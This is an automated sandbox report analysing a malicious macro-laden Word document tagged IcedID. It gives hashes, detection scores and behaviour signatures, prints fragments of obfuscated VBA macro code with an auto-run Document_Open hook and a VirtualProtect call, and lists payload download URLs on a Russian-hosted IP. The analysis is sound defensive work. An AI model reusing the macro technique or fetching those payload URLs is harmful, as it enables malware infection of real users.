Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
actionplan doc 08.11.doc

Overview

General Information

Sample Name:actionplan doc 08.11.doc
Analysis ID:682622
MD5:933338ca2c25cfda5c124455216d6709
SHA1:e518d12b7bb4addf1dc041a05575031890c1b4d7
SHA256:abc8d1097f0249c749f2c7d7058be1b39c88e21d26d45d76985c989289565214
Tags:docIcedID
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2972 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: actionplan doc 08.11.docVirustotal: Detection: 25%Perma Link
Source: actionplan doc 08.11.docReversingLabs: Detection: 17%
Source: actionplan doc 08.11.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{28B9B3A7-C636-414D-ACE1-7B74DE4F80F2}.tmpJump to behavior

System Summary

barindex
Source: Screenshot number: 8Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". wa ii: ^ 'rri Mp -
Source: Screenshot number: 8Screenshot OCR: Enable content". wa ii: ^ 'rri Mp - m~ O 100% G) A GE)
Source: actionplan doc 08.11.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: actionplan doc 08.11.docOLE, VBA macro line: Set = CallByName((), PtrvEuptBv("qAzbQdWy"), VbGet, )
Source: actionplan doc 08.11.docOLE, VBA macro line: Set = CallByName((PtrvEuptBv("k_qlfnX9")), PtrvEuptBv("FobMNFqWtNq6a"), VbGet, PtrvEuptBv("SLkPoakd"))
Source: actionplan doc 08.11.docOLE, VBA macro line: Set = CallByName((), PtrvEuptBv("gwno4Ujnar"), VbGet, )
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE, VBA macro line: Set = CallByName((), PtrvEuptBv("qAzbQdWy"), VbGet, )
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE, VBA macro line: Set = CallByName((PtrvEuptBv("k_qlfnX9")), PtrvEuptBv("FobMNFqWtNq6a"), VbGet, PtrvEuptBv("SLkPoakd"))
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE, VBA macro line: Set = CallByName((), PtrvEuptBv("gwno4Ujnar"), VbGet, )
Source: actionplan doc 08.11.docOLE, VBA macro line: Private Sub Document_Open()
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: actionplan doc 08.11.docOLE indicator, VBA macros: true
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{5247F4D0-671C-4B5A-A163-EC9E0BA13D41}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: actionplan doc 08.11.docVirustotal: Detection: 25%
Source: actionplan doc 08.11.docReversingLabs: Detection: 17%
Source: actionplan doc 08.11.LNK.0.drLNK file: ..\..\..\..\..\Desktop\actionplan doc 08.11.doc
Source: actionplan doc 08.11.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$tionplan doc 08.11.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR588B.tmpJump to behavior
Source: classification engineClassification label: mal64.expl.winDOC@1/11@0/1
Source: actionplan doc 08.11.docOLE document summary: title field not present or empty
Source: actionplan doc 08.11.docOLE document summary: author field not present or empty
Source: actionplan doc 08.11.docOLE document summary: edited time not present or 0
Source: ~WRF{5247F4D0-671C-4B5A-A163-EC9E0BA13D41}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{5247F4D0-671C-4B5A-A163-EC9E0BA13D41}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{5247F4D0-671C-4B5A-A163-EC9E0BA13D41}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFDA86EB9FE88A2E3F.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: actionplan doc 08.11.docInitial sample: OLE zip file path = docProps/custom.xml
Source: actionplan doc 08.11.docStatic file information: File size 2349822 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: ~WRF{5247F4D0-671C-4B5A-A163-EC9E0BA13D41}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Scripting
Path InterceptionPath Interception1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Ingress Tool Transfer
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
actionplan doc 08.11.doc25%VirustotalBrowse
actionplan doc 08.11.doc18%ReversingLabsScript-Macro.Trojan.Amphitryon
actionplan doc 08.11.doc100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFDA86EB9FE88A2E3F.TMP100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
45.8.146.139
unknownRussian Federation
44676VMAGE-ASRUfalse
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:682622
Start date and time:2022-08-11 19:22:49 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:actionplan doc 08.11.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.winDOC@1/11@0/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size getting too big, too many NtQueryAttributesFile calls found.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
45.8.146.139valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
feltenberger doc 08.11.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
agsilverfile08.11.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
No context
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
VMAGE-ASRUsuddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
feltenberger doc 08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
agsilverfile08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
No context
No context
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image data, 636 x 613, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):113730
Entropy (8bit):7.990292786537194
Encrypted:true
SSDEEP:3072:ShIiMUFV26oUc72Dl+oj/Yc6oGqdxVJw0c8N2mirB0VZp:ShMggmEceUi8N2miK/
MD5:E0B30095BE35E9494E5073277D4FC1A1
SHA1:19D39B036989A331F5389E377FBE565436599894
SHA-256:EA952A68D25232D981CDBE0CD6DA947A9386D4BFFD5D1BE2EF80C4A1246AC3E2
SHA-512:A524907D5D60AA77DB0BA3A3BF114EA7F8AEA9190ADAA84A0C78F96EC8E333AB124D68C84863E83E735D602117B0F3422746C9C4A0D6823CC8B51B652C41972E
Malicious:false
